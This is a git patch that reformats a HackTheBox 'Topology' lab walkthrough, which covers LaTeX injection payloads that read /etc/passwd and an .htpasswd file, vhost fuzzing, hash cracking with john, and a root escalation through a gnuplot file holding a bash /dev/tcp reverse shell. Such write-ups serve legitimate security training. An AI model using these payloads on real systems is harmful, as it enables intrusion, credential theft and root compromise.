From 8f3318b5844fb8914367a212c8239fa7ab8583c7 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sat, 4 Nov 2023 15:54:50 +0500
Subject: [PATCH] Update Topology.md
---
HackTheBox/Topology.md | 119 ++++++++++++++++++++++++++++++++---------
1 file changed, 95 insertions(+), 24 deletions(-)
diff --git a/HackTheBox/Topology.md b/HackTheBox/Topology.md
index 46ec392..8f5eb60 100644
--- a/HackTheBox/Topology.md
+++ b/HackTheBox/Topology.md
@@ -1,6 +1,8 @@
-HackTheBox - Topology
-NMAP
+# HackTheBox - Topology
+## NMAP
+
+```bash
Nmap scan report for 10.10.11.217
Host is up (0.20s latency).
Not shown: 65533 closed tcp ports (reset)
@@ -16,27 +18,50 @@ PORT STATE SERVICE VERSION
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+```
-PORT (80)
+## PORT (80)
Visiting the webserver, we'll have a static page
-This page lists software projects, out of which Latex Equation Generator takes us to `latex.topology.htb
+
-Adding the domain name in /etc/hosts file
+This page lists software projects, out of which Latex Equation Generator
+takes us to `latex.topology.htb
-Putting \input{/etc/passwd} will result to an illegal command
+
+
+
+
+Adding the domain name in `/etc/hosts` file
+
+
+
+
+
+Putting `\input{/etc/passwd}` will result to an illegal command
+
+
+
+
Most of the commands were blacklisted, we can only read the first line of files with:
+```tex
\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file
+```
+
+
+
+
We can make it read more lines but the limit was 3-4 lines
+```tex
\newread\file
\openin\file=/etc/passwd
\read\file to\line
@@ -48,47 +73,93 @@ We can make it read more lines but the limit was 3-4 lines
\read\file to\line
\text{\line}
\closein\file
+```
+
Exceeding 4 lines, we'll get an error
+
-Visiting the site the site with it's root directory / will reveal directory listing having tempfolder, in that folder we'll find texput.log
+Visiting the site the site with it's root directory `/` will reveal directory listing having `tempfolder`, in that folder we'll find `texput.log`
-So `\write18` is restricted, we cannot use it to execute commands neither read files, we can try fuzzing for vhosts using `wfuzz ` ```bash wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://topology.htb' -H "Host: FUZZ.topology.htb" --hh 6767 ```
+
-This finds two more vhosts, dev and stats, stats site doesn't really have much
+
+So `\write18` is restricted, we cannot use it to execute commands neither read files, we can try fuzzing for vhosts using `wfuzz
+`
+```bash
+wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://topology.htb' -H "Host: FUZZ.topology.htb" --hh 6767
+```
+
+
+
+This finds two more vhosts, `dev` and `stats`, stats site doesn't really have much
+
+
Dev site asks for credentials to access the site
-Since the latex on the site is using inline math mode , we can try using lsinputlisting for reading local files and we need to use it with $ at the beginning and ending of the latex command
+
+Since the latex on the site is using `inline math mode` , we can try using `lsinputlisting` for reading local files and we need to use it with `$` at the beginning and ending of the latex command
+
+```tex
$\lstinputlisting{/etc/passwd}$
+```
-With this we can access the whole /etc/passwd file and see that the sites are being hosted in /var/www
+
-We can read /var/www/dev/.htaccess file which shows that there's .htpasswd file
+With this we can access the whole /etc/passwd file and see that the sites are being hosted in `/var/www`
-vadaisley's hash can be cracked with john
+
+We can read `/var/www/dev/.htaccess` file which shows that there's `.htpasswd` file
+
+
+
+
+
+`vadaisley's` hash can be cracked with john
+
+```bash
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash.txt
+```
+
+
And now we can login through ssh
-Checking sudo -l this user cannot run any commands as root or any user
+
-In /opt there's folder gnuplot where we have only write access
+Checking `sudo -l` this user cannot run any commands as root or any user
-From pspy we see gnuplot being ran as the root user and executing plt files
+
-We can create a plt file with a bash reverse shell and move it in /opt/gnuplot
+In `/opt` there's folder `gnuplot` where we have only write access
+
+
+From `pspy` we see gnuplot being ran as the root user and executing plt files
+
+
+
+We can create a plt file with a bash reverse shell and move it in `/opt/gnuplot`
+
+```bash
system "bash -i >& /dev/tcp/10.10.14.111/2222 0>&1"
+```
-After few seconds we'll see our plt being executed as root and receive a connection on our listener with a root shell
+
-References
+After few seconds we'll see our plt being executed as root and receive a connection on our listener with a root shell
- https://0day.work/hacking-with-latex/
- https://texdoc.org/serve/latex2e.pdf/0
- https://www1.cmc.edu/pages/faculty/aaksoy/latex/latexthree.html
- https://en.wikibooks.org/wiki/LaTeX/Source_Code_Listings
- http://www.gnuplot.info/docs_4.2/node327.html
+
+
+
+
+## References
+
+- https://0day.work/hacking-with-latex/
+- https://texdoc.org/serve/latex2e.pdf/0
+- https://www1.cmc.edu/pages/faculty/aaksoy/latex/latexthree.html
+- https://en.wikibooks.org/wiki/LaTeX/Source_Code_Listings
+- http://www.gnuplot.info/docs_4.2/node327.html